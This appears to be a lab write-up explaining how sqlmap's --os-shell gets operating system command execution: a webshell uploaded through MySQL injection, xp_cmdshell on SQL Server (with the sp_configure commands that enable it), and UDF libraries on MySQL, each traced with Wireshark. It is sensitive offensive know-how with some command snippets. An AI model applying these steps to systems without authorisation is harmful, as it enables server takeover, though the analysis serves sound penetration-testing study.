Preface
When the database is MySQL, PostgreSQL, or Microsoft SQL Server, and the current user possesses the privileges required to invoke specific functions, sqlmap can be used to obtain an operating system shell.
In the case of MySQL and PostgreSQL, sqlmap uploads a binary library containing user-defined functions, sys_exec() and sys_eval(). These two functions, once created, are capable of executing system commands.
For Microsoft SQL Server, sqlmap employs the xp_cmdshell stored procedure. If this procedure is disabled (it is disabled by default in Microsoft SQL Server 2005 and later), sqlmap will attempt to re‑enable it; if it does not exist, sqlmap will create it automatically.
The following sections illustrate the principles behind the --os-shell feature by examining injection scenarios and direct database connections for SQL Server and MySQL.
Injection-Based --os-shell
Prerequisites:
- Write access to the web server’s document root.
- The
secure_file_privvariable is either empty or set to a writable path.
During a standard SQL injection, --os-shell operates primarily by uploading a sqlmap trojan, which is subsequently used to execute commands.
Test Environment
- Operating system: Microsoft Windows Server 2012 Standard
- Database: MySQL 5.1.60
- Scripting language: PHP 5.4.45
- Web server: Apache 2.4.39
Initially, sqlmap is employed to detect the injection point.
The --os-shell flag is then invoked.
At this stage, sqlmap performs three key actions:
- Probes the target to gather basic information.
- Uploads a shell to the target web server.
- Removes the shell upon exiting.
A packet capture with Wireshark, filtered to display only HTTP traffic, reveals the sequence.
Step 1 – sqlmap uploads a trojan that provides file‑upload functionality.
Following the HTTP stream reveals URL‑encoded content. Once decoded, it is apparent that the file is written to disk using INTO OUTFILE. The trojan’s code is hex‑encoded; decoding it exposes an upload‑capable script.
Step 2 – The uploaded trojan is used to transfer the actual shell.
Tracking the HTTP stream shows the shell’s source code in the request body.
Step 3 – Commands are passed to the shell for execution.
Step 4 – The shell is deleted.
A command is issued to remove the shell file.
Database‑Based --os-shell
When the database permits external connections, sqlmap can obtain a shell directly via the --os-shell flag.
Microsoft SQL Server
Prerequisites:
- The database server accepts external connections.
- The current database user holds
sa(system administrator) privileges.
With SQL Server, --os-shell relies on the xp_cmdshell extended stored procedure to execute operating system commands.
Test Environment
- Operating system: Microsoft Windows Server 2016 Datacenter
- Database: Microsoft SQL Server 2008
Sqlmap is used to connect to the database.
sqlmap -d "mssql://user:password@ip:port/dbname"
Sqlmap does not ship with the pymssql module; it must be installed manually.
After executing python -m pip install pymssql, the connection is established successfully.
The --os-shell command is then issued.
At this point, sqlmap performs three key actions:
- Identifies the database type and displays it.
- Checks whether the current user is a database administrator (i.e., verifies
saprivileges). - Determines whether
xp_cmdshellis enabled; if it is not, sqlmap attempts to enable it.
In this instance, sqlmap was unable to activate xp_cmdshell automatically.
Consequently, --sql-shell was used to enable it manually:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
When RECONFIGURE; was executed, sqlmap reported a syntax error.
A Python script calling the pymssql module was written to isolate the issue.
The SELECT @@version; command could be executed successfully.
The error produced when executing RECONFIGURE; matched the error observed in --sql-shell.
Because sqlmap uses the pymssql module for database connections, it was necessary to enable xp_cmdshell using an alternative tool. Navicat was employed for this purpose.
The commands to enable xp_cmdshell were then executed.
Once enabled, commands could be issued either through Navicat or by using sqlmap’s --os-shell.
If a tool such as Navicat is used for the initial connection, one must manually verify whether the user is a database administrator and whether xp_cmdshell is present.
SELECT IS_SRVROLEMEMBER('sysadmin')
This determines if the user holds the sa role.
SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype='x' AND name='xp_cmdshell';
A result of 1 indicates that xp_cmdshell exists.
After these checks, the process follows the same pattern described above.
A Wireshark capture of the TCP stream reveals the data sent.
The code was copied to a text file and certain characters were replaced.
Before executing the user‑supplied command, sqlmap runs ping -n 10 127.0.0.1 and echo 1 (marked as ① and ② in the figure). The commands that follow (③ onwards) are hex‑encoded.
MySQL
Prerequisites:
- The database server permits external connections.
- The
secure_file_privvariable is either empty or set to a writable path. - Write access to the MySQL installation directory is available.
- For versions greater than 5.1, the
/lib/plugindirectory must exist.
The MySQL --os-shell method leverages user‑defined functions (UDFs) to execute commands. This topic is covered in greater detail in the article MySQL UDF Privilege Escalation.
Test Environment
- Operating system: Microsoft Windows Server 2012 Standard
- Database: MySQL 5.1.60
Sqlmap is used to connect to the database.
After installing pymysql, a second connection attempt is made; upon success, sqlmap displays the approximate database version.
The --os-shell flag is then issued.
At this point, sqlmap performs five key actions:
- Connects to the MySQL database and retrieves its version.
- Verifies whether the current user is a database administrator.
- Checks if the
sys_execandsys_evalfunctions have already been created. - Uploads the appropriate DLL file to the target directory.
- When the user exits, removes the
sys_execandsys_evalfunctions (by default).
A Wireshark TCP stream capture is analysed. The image below provides a detailed illustration of the process.
Top comments (0)